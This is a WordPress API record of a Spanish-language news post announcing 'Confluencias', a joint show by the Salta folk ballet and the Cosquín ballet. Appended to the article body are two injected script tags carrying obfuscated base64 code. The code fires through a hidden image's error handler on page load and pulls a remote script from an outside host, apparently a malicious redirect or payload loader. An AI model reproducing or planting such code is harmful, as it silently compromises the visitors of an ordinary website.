{"id":4520,"date":"2024-10-24T09:36:24","date_gmt":"2024-10-24T12:36:24","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4520"},"modified":"2025-08-13T23:46:49","modified_gmt":"2025-08-14T02:46:49","slug":"el-ballet-folklorico-de-salta-y-el-ballet-de-cosquin-se-unen-en-el-espectaculo-confluencias","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4520","title":{"rendered":"El Ballet Folkl\u00f3rico de Salta y el Ballet de Cosqu\u00edn se unen en el espect\u00e1culo \u00abConfluencias\u00bb"},"content":{"rendered":"\n<h4 class=\"wp-block-heading\"><strong><em>Ma\u00f1ana viernes 25 y el s\u00e1bado 26 de octubre, el Ballet Folkl\u00f3rico de la Provincia y el Ballet Oficial de Cosqu\u00edn presentar\u00e1n \u00abConfluencias\u00bb en la Casa de la Cultura, Caseros 460. Entrada libre y gratuita para estudiantes y jubilados.<\/em><\/strong><\/h4>\n\n\n\n<p>Este fin de semana, el Ballet Folkl\u00f3rico de la Provincia \u00abGral. Mart\u00edn Miguel de G\u00fcemes\u00bb y el Ballet Oficial del Festival Nacional de Folklore de Cosqu\u00edn se unir\u00e1n en un evento especial denominado \u00abConfluencias\u00bb. El espect\u00e1culo, que tendr\u00e1 lugar este viernes 25 y el s\u00e1bado 26 de octubre a las 21 horas en la Casa de la Cultura de Salta, Caseros 460, busca celebrar la riqueza del folklore argentino y latinoamericano.<\/p>\n\n\n\n<p>La propuesta art\u00edstica surge como resultado del reconocimiento que el Ballet Folkl\u00f3rico de Salta recibi\u00f3 el a\u00f1o pasado al ser premiado como mejor elenco del pa\u00eds en los Premios Ch\u00facaro. Este logro abri\u00f3 puertas a diversas colaboraciones con compa\u00f1\u00edas de danza de renombre, entre ellas el Ballet Camin Cosqu\u00edn de C\u00f3rdoba, una de las agrupaciones m\u00e1s prestigiosas en el \u00e1mbito folkl\u00f3rico nacional.<\/p>\n\n\n\n<p>El espect\u00e1culo \u00abConfluencias\u00bb, bajo la direcci\u00f3n art\u00edstica de<strong>&nbsp;Daniel Espoz<\/strong>&nbsp;y&nbsp;<strong>Patricia Padilla<\/strong>&nbsp;para el Ballet Folkl\u00f3rico de Salta; y, de&nbsp;<strong>Valeria G\u00f3mez<\/strong>&nbsp;y&nbsp;<strong>Juan Mart\u00edn Goris<\/strong>&nbsp;para el Ballet Oficial de Cosqu\u00edn, ofrecer\u00e1 una variedad de danzas que abarcan el folklore de diferentes pa\u00edses latinoamericanos, incluyendo Bolivia, Paraguay, Uruguay, Per\u00fa y Chile. El cierre estar\u00e1 dedicado al folklore y al tango argentino, brindando al p\u00fablico un recorrido por las tradiciones culturales de la regi\u00f3n.<\/p>\n\n\n\n<p>El evento tambi\u00e9n coincide con la celebraci\u00f3n de octubre como el mes de la diversidad cultural, por lo que las coreograf\u00edas y la m\u00fasica estar\u00e1n impregnadas de esta tem\u00e1tica, resaltando la riqueza de la diversidad latinoamericana.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img fetchpriority=\"high\" decoding=\"async\" width=\"960\" height=\"600\" data-id=\"4522\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/10\/8804-el-ballet-folklorico-de-salta-y-el-ballet-de-cosquin-se-unen-en-el-espectaculo-confluencias.png\" alt=\"\" class=\"wp-image-4522\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/10\/8804-el-ballet-folklorico-de-salta-y-el-ballet-de-cosquin-se-unen-en-el-espectaculo-confluencias.png 960w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/10\/8804-el-ballet-folklorico-de-salta-y-el-ballet-de-cosquin-se-unen-en-el-espectaculo-confluencias-300x188.png 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/10\/8804-el-ballet-folklorico-de-salta-y-el-ballet-de-cosquin-se-unen-en-el-espectaculo-confluencias-768x480.png 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/10\/8804-el-ballet-folklorico-de-salta-y-el-ballet-de-cosquin-se-unen-en-el-espectaculo-confluencias-672x420.png 672w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/10\/8804-el-ballet-folklorico-de-salta-y-el-ballet-de-cosquin-se-unen-en-el-espectaculo-confluencias-696x435.png 696w\" sizes=\"(max-width: 960px) 100vw, 960px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" data-id=\"4521\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2024\/10\/8805-el-ballet-folklorico-de-salta-y-el-ballet-de-cosquin-se-unen-en-el-espectaculo-confluencias.png\" alt=\"\" class=\"wp-image-4521\"\/><\/figure>\n<\/figure>\n\n\n\n<p>Las entradas para \u00abConfluencias\u00bb tienen un costo de $4.000 y se pueden adquirir tanto en la boleter\u00eda de la Casa de la Cultura, Caseros 460, como a trav\u00e9s de la plataforma digital www.saltaticket.gob.ar. Adem\u00e1s, el ingreso ser\u00e1 gratuito para estudiantes y jubilados.<\/p>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"El Ballet Folkl\u00f3rico de Salta y el Ballet de Cosqu\u00edn se unen en el espect\u00e1culo &quot;Confluencias&quot;\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/XcciadzmIcY?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" referrerpolicy=\"strict-origin-when-cross-origin\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Ma\u00f1ana viernes 25 y el s\u00e1bado 26 de octubre, el Ballet Folkl\u00f3rico de la Provincia y el Ballet Oficial de Cosqu\u00edn presentar\u00e1n \u00abConfluencias\u00bb en la Casa de la Cultura, Caseros 460. Entrada libre y gratuita para estudiantes y jubilados. Este fin de semana, el Ballet Folkl\u00f3rico de la Provincia \u00abGral. Mart\u00edn Miguel de G\u00fcemes\u00bb y [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4523,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-4520","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4520"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4520"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4520\/revisions"}],"predecessor-version":[{"id":6656,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4520\/revisions\/6656"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4523"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4520"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4520"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4520"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}